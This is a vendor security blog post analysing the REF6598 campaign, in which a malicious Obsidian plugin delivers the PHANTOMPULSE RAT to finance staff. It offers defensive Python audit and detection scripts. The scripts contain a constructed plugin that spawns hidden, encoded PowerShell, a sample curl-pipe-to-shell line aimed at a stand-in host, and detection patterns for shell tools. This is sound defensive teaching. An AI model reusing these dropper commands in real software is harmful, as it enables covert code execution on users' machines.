
PHANTOMPULSE RAT: When Your Note-Taking App Becomes a Weapon Against Financial Sector Employees

A campaign tracked as REF6598 weaponizes the Obsidian note-taking app to deliver the PHANTOMPULSE RAT to financial sector employees. No exploit is involved: the attackers abuse legitimate software and a convincing recruitment story, which is exactly what exploit- and signature-focused defences are worst at catching. Saudi CISOs should understand this threat now.

FyntraLink Team

A sophisticated threat campaign, tracked as REF6598 by Elastic Security Labs, is actively targeting employees in the financial and cryptocurrency sectors with a previously undocumented Windows remote access trojan called PHANTOMPULSE. It is delivered not through a software vulnerability but through a legitimate note-taking application that no vulnerability scanner or application allowlist has any reason to flag. The attack vector is Obsidian, a widely used knowledge management tool, and the entry point is a LinkedIn connection request from what appears to be a venture capital firm.

The Attack Chain: From LinkedIn to Full Compromise

The campaign begins with a calculated social engineering play. Threat actors approach targets on LinkedIn, presenting themselves as representatives of a venture capital firm seeking to onboard a new portfolio advisor or financial analyst. The conversation feels professional and credible — multiple "partners" are involved, references are provided, and the communication eventually moves to a Telegram group where several purported colleagues are present to reinforce legitimacy.

Once engaged, the target is told that the firm runs its internal "management database" in Obsidian and is asked to open a shared vault using supplied credentials. Obsidian is a legitimate, respected tool used by researchers, writers and professionals worldwide, so enabling a community plugin that ships inside a vault from a prospective employer raises no immediate suspicion. Obsidian's safeguard here is Restricted Mode, which it applies when a vault contains community plugins; the onboarding instructions need only tell the victim to turn it off. Community plugins are JavaScript that runs inside Obsidian's Electron process with Node.js access, so a plugin's load handler can spawn any process the logged-in user can. No exploit is used, only Obsidian's own intended functionality, which is precisely why exploit-centric controls have nothing to catch.

On Windows, the plugin launches a PowerShell script that drops an intermediate loader called PHANTOMPULL, which decrypts PHANTOMPULSE and runs it directly in memory; only the loader stage touches disk, so file scanning never sees the decrypted RAT. On macOS, an obfuscated AppleScript dropper iterates over a hardcoded domain list and uses Telegram itself as a dead-drop resolver for fallback command-and-control (C2) communication.
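The mechanism above (an enabled community plugin whose main.js can require child_process and spawn a shell from its load handler) is something a defender can hunt for directly in a vault's plugin directory. The following is an added example written for this article; it is not Obsidian's code or anything from Elastic's report. It mirrors Obsidian's real on-disk layout (.obsidian/community-plugins.json lists enabled plugin ids; each plugin is .obsidian/plugins/<id>/manifest.json plus main.js), and the demo vault, the plugin names "word-count-widget" and "portfolio-sync", and the encoded payload are constructed; the payload is an inert placeholder, not the campaign's loader.

```python
"""Audit an Obsidian vault for community plugins able to run commands.

Added example, not part of the original article or of Elastic's research.
Obsidian stores the enabled plugin ids in .obsidian/community-plugins.json
and each plugin in .obsidian/plugins/<id>/ as manifest.json plus main.js.
Plugin code runs with Node.js access inside the app, so a main.js that
requires child_process can spawn anything the user can. The demo vault,
plugin names and the encoded payload below are constructed; the payload is
an inert placeholder.
"""
import json
import re
import tempfile
from pathlib import Path

# Strings a note-formatting plugin has no reason to contain.
SUSPICIOUS_PATTERNS = {
    "child_process": re.compile(r"""require\(\s*['"]child_process['"]\s*\)"""),
    "powershell": re.compile(r"powershell(?:\.exe)?", re.IGNORECASE),
    # -e/-enc/-EncodedCommand followed by a base64 blob of 20+ characters
    "encoded_command": re.compile(
        r"-(?:e|ec|enc|encodedcommand)\b[\s'\",]+[A-Za-z0-9+/=]{20,}", re.IGNORECASE),
    "osascript": re.compile(r"\bosascript\b"),
    "dynamic_eval": re.compile(r"\b(?:eval|new Function)\s*\("),
}


def enabled_plugins(vault: Path) -> list:
    """Plugin ids Obsidian will load for this vault (community-plugins.json)."""
    path = vault / ".obsidian" / "community-plugins.json"
    return json.loads(path.read_text(encoding="utf-8")) if path.exists() else []


def audit_vault(vault: Path) -> list:
    """One finding per installed plugin whose main.js hits any pattern."""
    findings = []
    enabled = set(enabled_plugins(vault))
    plugins_dir = vault / ".obsidian" / "plugins"
    if not plugins_dir.is_dir():
        return findings
    for plugin_dir in sorted(p for p in plugins_dir.iterdir() if p.is_dir()):
        manifest_path = plugin_dir / "manifest.json"
        main_js = plugin_dir / "main.js"
        manifest = (json.loads(manifest_path.read_text(encoding="utf-8"))
                    if manifest_path.exists() else {})
        code = main_js.read_text(encoding="utf-8", errors="replace") if main_js.exists() else ""
        hits = [name for name, rx in SUSPICIOUS_PATTERNS.items() if rx.search(code)]
        if hits:
            findings.append({
                "plugin": plugin_dir.name,
                "name": manifest.get("name", "?"),
                "author": manifest.get("author", "?"),
                "enabled": plugin_dir.name in enabled,   # disabled plugins still matter: one click away
                "indicators": hits,
            })
    return findings


def build_demo_vault(root: Path) -> Path:
    """Constructed vault: one benign plugin and one modelled on the REF6598 lure."""
    vault = root / "vc-portfolio-vault"
    benign = vault / ".obsidian" / "plugins" / "word-count-widget"
    dropper = vault / ".obsidian" / "plugins" / "portfolio-sync"
    benign.mkdir(parents=True)
    dropper.mkdir(parents=True)
    (vault / ".obsidian" / "community-plugins.json").write_text(
        json.dumps(["word-count-widget", "portfolio-sync"]), encoding="utf-8")
    (benign / "manifest.json").write_text(json.dumps(
        {"id": "word-count-widget", "name": "Word Count Widget",
         "author": "example", "version": "1.0.0"}), encoding="utf-8")
    (benign / "main.js").write_text(
        "module.exports = class extends require('obsidian').Plugin {\n"
        "  onload() { this.addStatusBarItem().setText('words'); }\n"
        "};\n", encoding="utf-8")
    (dropper / "manifest.json").write_text(json.dumps(
        {"id": "portfolio-sync", "name": "Portfolio Sync",
         "author": "vc-ops", "version": "0.1.0"}), encoding="utf-8")
    # Constructed stand-in for the malicious plugin: a hidden, encoded
    # PowerShell loader launched from onload(). Placeholder payload only.
    (dropper / "main.js").write_text(
        "const { spawn } = require('child_process');\n"
        "module.exports = class extends require('obsidian').Plugin {\n"
        "  onload() {\n"
        "    spawn('powershell.exe', ['-w', 'hidden', '-nop', '-enc',\n"
        "      'VwByAGkAdABlAC0ASABvAHMAdAAgACIAZABlAG0AbwAiAA=='],\n"
        "      { detached: true, stdio: 'ignore' });\n"
        "  }\n"
        "};\n", encoding="utf-8")
    return vault


def run_demo() -> list:
    """Build the constructed vault in a temp dir and audit it."""
    with tempfile.TemporaryDirectory() as tmp:
        return audit_vault(build_demo_vault(Path(tmp)))


if __name__ == "__main__":
    for finding in run_demo():
        print(finding)
```

Pointed at a real vault (`audit_vault(Path("~/Vaults/work").expanduser())`), the script reports the benign plugin as clean and the lure plugin with child_process, powershell and encoded_command indicators. It is a triage aid, not a verdict: a minified or string-obfuscated main.js can hide these tokens, so a hit is a reason to read the code and a miss is not a clean bill.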

PHANTOMPULSE: An AI-Generated Backdoor with Blockchain C2

PHANTOMPULSE is notable for two design choices that make detection and takedown harder than with conventional malware. First, its code structure, obfuscation patterns and evasion logic show signs of having been produced or assisted by a large language model; code that is regenerated rather than reused defeats signature matching. Second, it resolves its C2 server by reading the Ethereum blockchain: it fetches the latest transaction associated with a hardcoded wallet address and takes the C2 location from it. Nobody can delete that transaction, and the operators can repoint every infected host simply by sending a new one, so blocking a C2 domain or IP only buys time. The design is not unobservable, though: the malware still has to read the chain through an HTTP API or a public RPC node, and that lookup is the one fixed, blockable step in the chain.

Once active, PHANTOMPULSE provides attackers with comprehensive access: system telemetry collection, remote command execution, file upload and exfiltration, screenshot capture, and full keylogging. For a financial sector employee with access to trading systems, customer records, or internal banking portals, this level of access represents a catastrophic exposure.

Why This Threat Is Directly Relevant to Saudi Financial Institutions

Saudi banks, insurers and fintech firms operate in an environment where LinkedIn is a primary professional networking channel. A relationship-based business culture makes a well-crafted approach from a "VC partner" entirely plausible, and employees in investment, treasury, compliance and corporate development functions are precisely the high-value targets REF6598 pursues. SAMA's Cyber Security Framework mandates cyber security awareness and training, but most programmes do not cover social engineering that ends in installing software rather than clicking a link. The PHANTOMPULSE campaign exploits that gap deliberately. And because the attack uses no CVE and abuses a legitimate tool, the framework's vulnerability management controls offer no direct protection here; this is a controls gap that needs specific attention.

Detection, Defense, and Recommended Controls

  1. Block or restrict Obsidian community plugins via endpoint policy: If your organisation does not officially use Obsidian, add it to your software blocklist. If it is used, only curated, approved plugins should be permitted in a financial institution environment. Obsidian does not ship an enterprise policy template for this, so in practice enforcement means application control (AppLocker or WDAC) on the Obsidian binary, monitoring of .obsidian/plugins directories on managed endpoints, or both.
  2. Deploy behavioural EDR rules for PowerShell in-memory execution: PHANTOMPULSE is staged by PHANTOMPULL through PowerShell and runs in memory. Elastic Security Labs published detection logic with the REF6598 report; check that your EDR vendor has equivalent coverage, that your SOC has it loaded, and that it alerts on shells and script hosts spawned by note-taking or productivity applications, especially with hidden-window or encoded-command arguments.
  3. Monitor for blockchain API lookups from endpoints: An endpoint querying Etherscan's API or a public Ethereum JSON-RPC node outside an approved fintech workflow is highly anomalous and warrants immediate investigation. Implement DNS and proxy-layer blocking of known blockchain API endpoints for non-authorised workstations, and alert on the attempts rather than silently dropping them, since the attempt itself is the indicator.
  4. Update security awareness training to include application-layer lures: Phishing simulation programmes should include scenarios in which targets are asked to install or use "legitimate" software as part of an onboarding or collaboration flow. The REF6598 campaign succeeds precisely because it does not look like a phishing email.
  5. Apply zero-trust segmentation to workstations with financial system access: Even if an endpoint is compromised, lateral movement and data exfiltration should be constrained by micro-segmentation. Ensure that employees with access to core banking, treasury, or customer data platforms operate on network segments with strict outbound controls aligned with NCA ECC Control 2-5 (Network Security Management).
  6. Implement LinkedIn and social media usage policies: Define clear guidelines for how employees should respond to unsolicited outreach requesting installation of software or access to external platforms. Require that any such request be escalated to the security team before action is taken.
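Items 2 and 3 above are the two detections a SOC can express as rules today. The following is an added example written for this article, not part of Elastic's published logic or any vendor's rule set. Field names follow Sysmon's process-creation (Event 1) and DNS-query (Event 22) records; the events, hostnames, the approved-workstation list and the blockchain API host list are constructed for the example and should be tuned from your own telemetry.

```python
"""Detections for the REF6598 chain, run over constructed endpoint telemetry.

Added example, not part of the original article or of any vendor's rule set.
Field names follow Sysmon's process-creation (Event 1) and DNS-query (Event
22) records; the events, hostnames and allowlists are constructed.

  1. productivity_app_spawns_shell: Obsidian spawning a shell or script host,
     raised to high severity when the command line is hidden or encoded;
  2. blockchain_api_egress: a workstation outside the sanctioned crypto
     workflow resolving a blockchain API host such as Etherscan.
"""
import re
from dataclasses import dataclass

PRODUCTIVITY_APPS = {"obsidian.exe", "obsidian"}   # Windows binary, macOS bundle executable
SHELLS = {"powershell.exe", "pwsh.exe", "cmd.exe", "osascript", "bash", "sh", "zsh"}
ENCODED = re.compile(r"-(?:e|ec|enc|encodedcommand)\b\s+[A-Za-z0-9+/=]{20,}", re.IGNORECASE)
HIDDEN = re.compile(r"-w(?:indowstyle)?\s+hidden", re.IGNORECASE)

# Public endpoints a sample would need in order to read a wallet's latest
# transaction. Assumed list; tune it from your proxy logs.
BLOCKCHAIN_API_HOSTS = {"api.etherscan.io", "etherscan.io", "mainnet.infura.io",
                        "eth-mainnet.g.alchemy.com", "cloudflare-eth.com"}
APPROVED_BLOCKCHAIN_HOSTS = {"FIN-TREASURY-07"}   # constructed: sanctioned crypto workstation


@dataclass
class Alert:
    rule: str
    severity: str
    computer: str
    detail: str


def basename(path: str) -> str:
    """Last path component, lower-cased, for Windows or POSIX paths."""
    return path.replace("\\", "/").rsplit("/", 1)[-1].lower()


def check_process(ev: dict):
    """Rule 1: a productivity app is the parent of a shell or script host."""
    parent, child = basename(ev["ParentImage"]), basename(ev["Image"])
    if parent not in PRODUCTIVITY_APPS or child not in SHELLS:
        return None
    cmd = ev.get("CommandLine", "")
    severity, reasons = "medium", [f"{parent} spawned {child}"]
    if ENCODED.search(cmd):
        severity, reasons = "high", reasons + ["encoded command"]
    if HIDDEN.search(cmd):
        severity, reasons = "high", reasons + ["hidden window"]
    return Alert("productivity_app_spawns_shell", severity, ev["Computer"], "; ".join(reasons))


def check_dns(ev: dict):
    """Rule 2: blockchain API lookup from a host with no approved crypto workflow."""
    host = ev["QueryName"].lower()
    watched = host in BLOCKCHAIN_API_HOSTS or any(host.endswith("." + h) for h in BLOCKCHAIN_API_HOSTS)
    if not watched or ev["Computer"] in APPROVED_BLOCKCHAIN_HOSTS:
        return None
    return Alert("blockchain_api_egress", "high", ev["Computer"],
                 f"{basename(ev['Image'])} resolved {host} outside the approved workflow")


def run_detections(events: list) -> list:
    """Apply both rules to a stream of events and return the alerts in order."""
    handlers = {"ProcessCreate": check_process, "DnsQuery": check_dns}
    alerts = []
    for ev in events:
        alert = handlers.get(ev["EventType"], lambda _: None)(ev)
        if alert:
            alerts.append(alert)
    return alerts


# Constructed telemetry, in the order a SIEM would receive it.
SAMPLE_EVENTS = [
    {"EventType": "ProcessCreate", "Computer": "FIN-ANALYST-12",
     "ParentImage": r"C:\Users\sara\AppData\Local\Obsidian\Obsidian.exe",
     "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "CommandLine": "powershell.exe -w hidden -nop -enc VwByAGkAdABlAC0ASABvAHMAdAAgACIAZABlAG0AbwAiAA=="},
    {"EventType": "ProcessCreate", "Computer": "FIN-ANALYST-12",     # ordinary admin script: not this rule's concern
     "ParentImage": r"C:\Windows\explorer.exe",
     "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "CommandLine": "powershell.exe -File C:\\Scripts\\daily-report.ps1"},
    {"EventType": "ProcessCreate", "Computer": "MAC-CORPDEV-03",      # macOS variant of the chain
     "ParentImage": "/Applications/Obsidian.app/Contents/MacOS/Obsidian",
     "Image": "/usr/bin/osascript",
     "CommandLine": "osascript -e 'do shell script \"curl -s https://example.invalid/x | sh\"'"},
    {"EventType": "DnsQuery", "Computer": "FIN-ANALYST-12",
     "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "QueryName": "api.etherscan.io"},
    {"EventType": "DnsQuery", "Computer": "FIN-TREASURY-07",         # approved workflow: suppressed
     "Image": r"C:\Program Files\TreasuryDesk\TreasuryDesk.exe",
     "QueryName": "api.etherscan.io"},
    {"EventType": "DnsQuery", "Computer": "FIN-ANALYST-12",
     "Image": r"C:\Program Files\Google\Chrome\Application\chrome.exe",
     "QueryName": "www.linkedin.com"},
]

if __name__ == "__main__":
    for alert in run_detections(SAMPLE_EVENTS):
        print(f"[{alert.severity}] {alert.rule} on {alert.computer}: {alert.detail}")
```

Run as-is it raises three alerts: the hidden, encoded PowerShell child of Obsidian.exe (high), the osascript child of Obsidian on the Mac (medium, because nothing in the command line is encoded), and the Etherscan lookup from the analyst workstation (high). The explorer-launched script and the treasury desk's lookup are deliberately left alone, which is the point of keying rule 1 on the parent process and rule 2 on an allowlist rather than on PowerShell or Etherscan alone.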

Conclusion

PHANTOMPULSE represents a maturation in threat actor tradecraft: moving from exploit-based delivery to social trust exploitation, from traditional C2 infrastructure to blockchain-based resilience, and from commodity malware to AI-assisted tooling. For Saudi financial institutions that have invested heavily in perimeter defences, endpoint detection, and vulnerability patching, this campaign is a reminder that attackers are deliberately engineering around those investments. The attack surface now includes your employees' professional identities and the productivity software they use daily.

SAMA Cyber Security Framework compliance provides the mandatory baseline, but defending against REF6598-class threats requires security awareness programmes, endpoint behavioural controls and network-layer visibility that go beyond checklist compliance.

Is your organisation prepared for application-layer social engineering? Contact Fyntralink for a complimentary SAMA Cyber Maturity Assessment and a tailored security awareness gap analysis for your financial institution.